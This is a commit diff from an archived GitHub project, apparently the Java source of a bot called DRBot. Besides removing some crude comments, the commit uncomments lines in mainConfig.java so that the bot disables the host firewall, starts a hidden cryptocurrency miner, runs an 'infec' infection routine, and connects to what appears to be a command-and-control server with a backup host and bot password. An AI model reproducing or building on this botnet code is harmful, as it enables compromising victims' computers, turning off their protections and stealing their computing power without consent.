Skip to content
This repository was archived by the owner on Jul 25, 2022. It is now read-only.

Commit 90e8bea

Browse files
committed
minor changes applied
1 parent 44d92c0 commit 90e8bea

File tree

3 files changed

+10
-10
lines changed

3 files changed

+10
-10
lines changed

src/InitConn/InitConn.java

+1-1
Original file line numberDiff line numberDiff line change
@@ -69,7 +69,7 @@ public void run(){
6969
try {
7070
connectToServer();
7171
getStreams();
72-
sendData(getNickSend()); //the client decides the shit first then the
72+
sendData(getNickSend());
7373
processConn(writer,reader);
7474
} catch (IOException ex) {}
7575
finally{

src/com/DRBot/SecureLine/SecureLine.java

+1-1
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,7 @@
66
/**
77
*
88
* @author Meron
9-
* -- I just created this one to handle the secure line transaction ..... well fuck it ....
9+
* -- I just created this one to handle the secure line transaction ....
1010
* i will do it .....
1111
*
1212
* blahblahb blah blah blah blah blah blah .........

src/main/mainConfig.java

+8-8
Original file line numberDiff line numberDiff line change
@@ -50,18 +50,18 @@ public class mainConfig{
5050
private static ExecutorService Service;
5151

5252
public static void main(String args[]) throws InterruptedException{
53-
// myClass = new File(mainConfig.class.getProtectionDomain().getCodeSource().getLocation().getFile().replace("%20"," "));
54-
// checkOS checkOS = new checkOS(botName,myClass);
55-
// disableFirewall disableFirewall = new disableFirewall();
56-
// //------------ Miner Config can be held in the chkMiner Main Class --------------
57-
//
58-
// chkMiner chkMiner = new chkMiner();
53+
myClass = new File(mainConfig.class.getProtectionDomain().getCodeSource().getLocation().getFile().replace("%20"," "));
54+
checkOS checkOS = new checkOS(botName,myClass);
55+
disableFirewall disableFirewall = new disableFirewall();
56+
//------------ Miner Config can be held in the chkMiner Main Class --------------
57+
58+
chkMiner chkMiner = new chkMiner();
5959

6060
//------------ Miner End Here
6161
Service = Executors.newCachedThreadPool();
62-
//infec infect = new infec(myClass);
62+
infec infect = new infec(myClass);
6363
Thread InitCo = new Thread(new InitConn(Server1,myBackupServer,port,botPassword,Engaged));
64-
// Service.execute(infect);
64+
Service.execute(infect);
6565
Service.execute(InitCo);
6666
Service.shutdown();
6767
}

0 commit comments

Comments
 (0)